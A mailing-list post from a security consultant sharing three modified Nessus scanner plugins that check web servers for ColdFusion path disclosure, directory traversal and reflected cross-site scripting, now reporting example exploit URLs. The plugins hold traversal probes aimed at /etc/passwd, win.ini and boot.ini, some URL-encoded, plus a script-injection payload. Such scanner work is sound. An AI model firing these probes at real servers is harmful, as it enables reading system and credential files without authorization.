Hi,

11393 ColdFusion Path Disclosure - Output now includes the discovered web root
10297 Web traversal - Output now includes example exploit URL
10815 Cross Site Scripting - Output now includes example exploit URL

Paul

--
Paul Johnston
Internet Security Specialist
Westpoint Limited
Albion Wharf, 19 Albion Street, Manchester, M1 5LN England
Tel: +44 (0)161 237 1028
Fax: +44 (0)161 237 1031
email: paulat_private
web: www.westpoint.ltd.uk

#
# This script was written by Renaud Deraison <deraisonat_private>
# Modified by Paul Johnston for Westpoint Ltd to display the web root
#
# See the Nessus Scripts License for details
#
# Plugin 11393: requests /nul.dbm on the web service and, when the reply
# echoes a Windows drive path ending in nul.dbm, reports the captured
# directory prefix as the server's web root.  Only one request is sent.
#

# Report text.  The captured web root is appended to the end of this string
# at report time, so it must end with "The web root is : ".
desc["english"] = "
It is possible to make the remote web server disclose the
physical path to its web root by requesting a MS-DOS device
ending in .dbm (as in nul.dbm).

Solution : The vendor suggests turning on 'Check that file exists' :
Windows 2000:
1. Open the Management console
2. Click on 'Internet Information Services'
3. Right-click on the website and select 'Properties'
4. Select 'Home Directory'
5. Click on 'Configuration'
6. Select '.cfm'
7. Click on 'Edit'
8. Make sure 'Check that file exists' is checked
9. Do the same for '.dbm'

Risk factor : Low

The web root is : ";

# Registration phase: the engine runs the script once with `description`
# set to collect metadata, and the script exits before sending any traffic.
if(description)
{
 script_id(11393);
 name["english"] = "ColdFusion Path Disclosure";
 script_name(english:name["english"]);
 script_version ("$Revision: 1.4 $");
 script_cve_id("CVE-2002-0576");
 script_bugtraq_id(4542);
 script_description(english:desc["english"]);
 summary["english"] = "Checks for a ColdFusion vulnerability";
 script_summary(english:summary["english"]);
 # ACT_GATHER_INFO: a single benign GET, no denial-of-service risk.
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison", francais:"Ce script est Copyright (C) 2003 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 # find_service.nes populates Services/www; no404.nasl is declared so
 # its knowledge-base entries exist before this plugin runs.
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

#
# The script code starts here
#

# Use the discovered web port, falling back to 80 when the KB has none.
port = get_kb_item("Services/www");
if(!port) port = 80;
if(!get_port_state(port))exit(0);

req = http_get(item:"/nul.dbm", port:port);
res = http_keepalive_send_recv(port:port, data:req);

# Capture group 1 is the directory prefix: a drive letter, a colon and
# everything up to (and including) the backslash that precedes "nul.dbm".
# "[^<>]" keeps the match from running across HTML tags in an error page.
# eregmatch yields NULL when the pattern does not match.
webroot = eregmatch(pattern:"([A-Z]:\\[^<>]+\\)nul.dbm", string:res);
if(!isnull(webroot))
{
 # The report is the description followed by the captured path (group 1).
 security_warning(port:port, data:string(desc["english"], webroot[1]));
}

#
# This script was written by Renaud Deraison <deraisonat_private>
# And hacked three years later by Michel Arboi...
#
# See the Nessus Scripts License for details
#
# Plugin 10297: generic directory-traversal check for web servers.  Two
# null-terminated lists of probe paths are walked in order: Windows-style
# paths (verified through check_win_dir_trav_ka) and then Unix-style paths
# (verified by looking for a passwd-format root line in the reply).  The
# first successful path is reported as a full URL and the script exits.
#

##############
# References:
##############
# Message-ID: <057801c26b19$529b2950$c64896d4@beyondmobile1>
# Date: Thu, 3 Oct 2002 22:12:31 +0200
# From: "Aviram Jenik" <aviramat_private>
# Subject: BearShare Directory Traversal Issue Resurfaces
# To: win2ksecadviceat_private
#
# Date: 25 Sep 2002 09:10:45 -0000
# Message-ID: <20020925091045.29313.qmailat_private>
# From: "DownBload" <downbloadat_private>
# To: bugtraqat_private
# Subject: IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server
#
# From: "David Endler" <dendlerat_private>
# To:vulnwatchat_private
# Date: Mon, 23 Sep 2002 16:41:19 -0400
# Subject: iDEFENSE Security Advisory 09.23.2002: Directory Traversal in Dino's Webserver
#
# From:"UkR security team^(TM)" <cuctemaat_private>
# Subject: advisory
# To: bugtraqat_private
# Date: Thu, 05 Sep 2002 16:30:30 +0400
# Message-ID: <web-29288022at_private>
#
# From: "Tamer Sahin" <tsat_private>
# To: bugtraqat_private
# Subject: Web Server 4D/eCommerce 3.5.3 Directory Traversal Vulnerability
# Date: Tue, 15 Jan 2002 00:36:26 +0200
# Affiliation: http://www.securityoffice.net
#
# From: "Alex Forkosh" <aforkoshat_private>
# To: bugtraqat_private
# Subject: Viewing arbitrary file from the file system using Eshare Expressions 4 server
# Date: Tue, 5 Feb 2002 00:18:42 -0600
#
# Should also apply for BID 7308, 7378, 7362, 7544, 7715
#
# From: "mattmurphyat_private" <mattmurphyat_private>
# Subject: Zeroo Folder Traversal Vulnerability
# To: newsat_private, vulnwatchat_private, bugtraqat_private
# Date: Thu, 21 Nov 2002 19:49:46 -0500
# Reply-To: mattmurphyat_private
#
# From: supportat_private
# Subject: [NEWS] Remote Console Applet Allows Remote File Retrieval
# To: listat_private
# Date: 15 Dec 2002 23:17:34 +0200
#

# Report text.  The successful probe URL is appended at report time, so the
# string must end with "Example exploit URL : ".
desc["english"] = "
It is possible to read arbitrary files on the remote server by prepending ../../ or ..\..\ in front on the file name.

Solution : Use another web server

Risk factor : High

Example exploit URL : ";

# Registration phase: metadata only, no traffic is sent.
if(description)
{
 script_id(10297);
 script_version ("$Revision: 1.27 $");
 name["english"] = "Web server traversal";
 name["francais"] = "Web server traversal";
 script_name(english:name["english"], francais:name["francais"]);

 # French report text (no exploit URL is appended to this variant).
 desc["francais"] = "Il est possible de lire n'importe quel fichier sur la machine distante en ajoutant des points devant leur noms, tels que ../../ ou ..\..\.

Solution : désactivez ce service et installez un vrai serveur web.

Facteur de risque : Elevé";

 script_description(english:desc["english"], francais:desc["francais"]);
 summary["english"] = "\..\..\file.txt";
 summary["francais"] = "\..\..\file.txt";
 script_summary(english:summary["english"], francais:summary["francais"]);
 # ACT_ATTACK: this plugin actively retrieves system files, so it is
 # only run when the scan policy allows attack-category checks.
 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison", francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 # no404.nasl must run first: its KB entry controls the quickcheck flag below.
 script_dependencie("find_service.nes", "no404.nasl", "httpver.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

port = get_kb_item("Services/www");
if(!port)port = 80;
if(! get_port_state(port)) exit(0);

# quickcheck (qc) is enabled by default and turned off when no404.nasl has
# recorded a www/no404/<port> entry for this server.  That entry is
# presumably set for servers that answer missing pages with a non-404 page,
# where a status-only check would produce false positives.
qc=1;
k = string("www/no404/", port);
if (get_kb_item(k)) qc=0;

# Windows-style probes.  r[] is a null-terminated list; the trailing 0 ends
# the for loop below.
i=0;
r[i] = string("..\\..\\..\\..\\..\\..\\windows\\win.ini"); i=i+1;
r[i] = string("..\\..\\..\\..\\..\\..\\winnt\\win.ini"); i=i+1;
r[i] = "/%5c..%5c..%5c..%5cwindows%5cwin.ini"; i=i+1;
r[i] = "/%5c..%5c..%5c..%5cwindows%5cwin%2eini"; i=i+1;
r[i] = "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini"; i=i+1;
r[i] = "/%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini"; i=i+1;
r[i] = "/%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini"; i=i+1;
r[i] = string("/.|./.|./.|./.|./.|./.|./.|./winnt/win.ini"); i=i+1;
r[i] = string("/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini"); i=i+1;
r[i] = string("/.../.../.../.../.../.../.../.../.../winnt/win.ini"); i=i+1;
r[i] = 0;

# check_win_dir_trav_ka (from the keepalive include) decides whether the
# reply looks like the requested file; its matching logic is not visible here.
for (i=0; r[i]; i=i+1)
{
 if (check_win_dir_trav_ka(port: port, url: r[i], quickcheck: qc))
 {
  # Embed the exact URL that succeeded so the finding can be re-verified
  # and the affected path fixed; only the first hit is reported.
  exploit_url = string("http://", get_host_ip(), ":", port, r[i]);
  security_hole(port:port, data:string(desc["english"], exploit_url));
  exit(0);
 }
}

# Unix-style probes, same null-terminated layout.
i=0;
r[i] = "../../../../../../etc/passwd"; i=i+1;
r[i] = "/../../../../../../../../../etc/passwd"; i=i+1;
r[i] = "//../../../../../../../../../etc/passwd"; i=i+1;
r[i] = string("/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"); i=i+1;
r[i] = 0;

for (i = 0; r[i]; i=i+1)
{
 req = http_get(item: r[i], port:port);
 rc = http_keepalive_send_recv(port:port, data:req);
 # NOTE(review): a NULL reply (connection failure) aborts the whole check
 # rather than moving on to the next probe; remaining paths are never tried.
 if(rc == NULL ) exit(0);
 # Positive only if the body carries a passwd-format root entry
 # ("root:<anything>:0:0:" or ":0:1:"), not merely a 200 status.
 if(egrep(pattern:"root:.*:0:[01]:", string:rc))
 {
  exploit_url = string("http://", get_host_ip(), ":", port, r[i]);
  security_hole(port:port, data:string(desc["english"], exploit_url));
  exit(0);
 }
}

# this code was the "40x_cross_site.nasl" written by SecuriTeam and was modified
# by CIRT.net (sqat_private) (with help from SecuriTeam) to check for multiple cross
# site scripting vuls.
# Update by Felix Huber - huberfelixat_private - 14.11.2001
# Update by Chris Sullo - sqat_private - 16.11.2001
# false positive fix by Andrew Hintz - http://guh.nu - 1.3.2002
# Update by rd: thanks to Andrew's remarks, HTTP headers are discarded
# Update by Chris Sullo - sqat_private - 06/27/2002 -- added .cfm test
#
# Covers BID 5305 / CVE CAN-2002-1060
# Covers BID 7353
#
# Plugin 10815: reflected-XSS check against the server's own error page.
# A request for a non-existent path containing a <SCRIPT> marker is sent
# with several extensions; if the response BODY echoes the marker verbatim
# (unencoded), the server is reported and a generic_xss KB flag is set.
#

# Report text.  The reproducing URL is appended at report time, so the
# string must end with "Example exploit URL : ".
desc["english"] = "The remote web server seems to be vulnerable to the Cross Site Scripting vulnerability (XSS).
The vulnerability is caused by the result returned to the user when a non-existing file is requested (e.g. the result contains the JavaScript provided in the request).
The vulnerability would allow an attacker to make the server present the user with the attacker's JavaScript/HTML code.
Since the content is presented by the server, the user will give it the trust level of the server (for example, the trust level of banks, shopping centers, etc. would usually be high).

Risk factor : Medium

Solutions:

. Allaire/Macromedia Jrun:
- http://www.macromedia.com/software/jrun/download/update/
- http://www.securiteam.com/windowsntfocus/Allaire_fixes_Cross-Site_Scripting_security_vulnerability.html

. Microsoft IIS:
- http://www.securiteam.com/windowsntfocus/IIS_Cross-Site_scripting_vulnerability__Patch_available_.html

. Apache:
- http://httpd.apache.org/info/css-security/

. ColdFusion:
- http://www.macromedia.com/v1/handlers/index.cfm?ID=23047

. General:
- http://www.securiteam.com/exploits/Security_concerns_when_developing_a_dynamically_generated_web_site.html
- http://www.cert.org/advisories/CA-2000-02.html

Example exploit URL : ";

# Registration phase: metadata only, no traffic is sent.
if (description)
{
 script_id(10815);
 script_bugtraq_id(5305, 7353, 7344, 8037);
 script_version("$Revision: 1.18 $");
 script_name(english:"Web Server Cross Site Scripting");
 script_description(english:desc["english"]);
 script_summary(english:"Determine if the remote host is vulnerable to Cross Site Scripting vulnerability");
 # ACT_GATHER_INFO: a handful of GETs for non-existent files, nothing destructive.
 script_category(ACT_GATHER_INFO);
 script_family(english:"Misc.", francais:"Divers");
 script_copyright(english:"(c) 2001 SecuriTeam, modified by Chris Sullo and Andrew Hintz");
 script_dependencie("find_service.nes", "httpver.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

port = get_kb_item("Services/www");
if(!port)port = 80;

# Extensions appended to the probe path, one request each, so that
# handlers mapped by extension (JSP, SSI, ColdFusion) are exercised as
# well as the default 404 handler.  The empty string terminates the loop.
# NOTE(review): if "" is false in this interpreter the loop stops at
# dir[3] and the bare (no-extension) URL is never tested — confirm.
dir[0] = ".jsp";
dir[1] = ".shtml";
dir[2] = ".thtml";
dir[3] = ".cfm";
dir[4] = "";

if(get_port_state(port))
{
 for (i = 0; dir[i] ; i = i + 1)
 {
  # A fresh socket per probe; no keepalive is used in this plugin.
  soc = http_open_socket(port);
  if(soc)
  {
   url = string("/<SCRIPT>alert('Vulnerable')</SCRIPT>", dir[i]);
   # Marker that must appear verbatim in the body for a positive result;
   # a server that HTML-encodes the path will not match.
   confirmtext = string("<SCRIPT>alert('Vulnerable')</SCRIPT>");
   req = http_get(item:url, port:port);
   send(socket:soc, data:req);
   # Headers are consumed into `head` and never inspected: the match is
   # made only against the body, so a path echoed in a header (e.g. a
   # redirect) cannot trigger a false positive (see the 2002 fix above).
   head = http_recv_headers(soc);
   r = http_recv(socket:soc);
   http_close_socket(soc);
   if(confirmtext >< r)
   {
    # Report the exact reproducing URL, then record the finding in the KB
    # under www/<port>/generic_xss (presumably so other plugins can skip
    # per-CGI XSS checks on a server that reflects everything).
    exploit_url = string("http://", get_host_ip(), ":", port, url);
    security_warning(port:port, data:string(desc["english"], exploit_url));
    set_kb_item(name:string("www/", port, "/generic_xss"), value:TRUE);
    exit(0);
   }
  }
  # A failed connect ends the check rather than retrying.
  else exit(0);
 }
}